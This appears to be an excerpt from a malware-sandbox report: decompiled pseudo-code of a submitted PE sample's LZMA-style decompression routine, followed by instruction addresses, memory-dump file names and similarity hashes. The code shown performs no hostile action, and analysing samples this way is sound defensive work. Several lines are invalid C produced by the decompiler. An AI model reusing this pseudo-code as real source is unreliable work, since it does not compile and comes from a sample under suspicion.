												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x0040711c
0x0040711c
0x00407120
0x0040712d
0x00407137
0x00000000
0x00407122
0x00407122
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00407056
0x00407059
0x004073cb
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x004073cb
0x004073cb
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x0040744d
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb
0x00000000
0x00407120

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
